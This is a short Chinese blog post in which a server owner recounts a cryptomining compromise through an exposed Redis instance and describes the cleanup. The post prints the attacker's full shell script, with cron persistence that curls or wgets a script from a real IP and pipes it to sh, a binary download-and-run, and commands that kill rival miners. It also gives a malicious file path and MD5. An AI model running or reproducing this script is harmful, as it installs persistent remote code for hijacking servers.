记一次被攻击了

攻击者ip

http://165.225.157.157:8000/i.sh

 

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddgs.3010" ]; then
    curl -fsSL http://165.225.157.157:8000/static/3010/ddgs.$(uname -m) -o /tmp/ddgs.3010
fi
chmod +x /tmp/ddgs.3010 && /tmp/ddgs.3010

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

 

不过这个黑产牛没有搞什么破坏,就是用你机器对外发起了攻击,外加挖矿。。。阿里报警了200多条警告才去处理(因为服务器快到期和懒的原因)

原因也查出来了,就是Redis数据库配置不当,因为之前学习数据库的时候对外开放了,被人利用了redis提了权

 

 

处理方法

结束进程,关闭任务,修复漏洞,自己把Redis删除了因为没用了

 

嗯,

/root/.ssh/authorized_keys 路径下有一个免密登录证书,删除下,然后改密码

挖矿程序

  • 恶意文件路径: /tmp/imWBR1
  • 恶意文件md5: 9ebf7fc39efe7c553989d54965ebb468

基本上问题就处理完毕了

 

 

 

 

发表评论

电子邮件地址不会被公开。 必填项已用*标注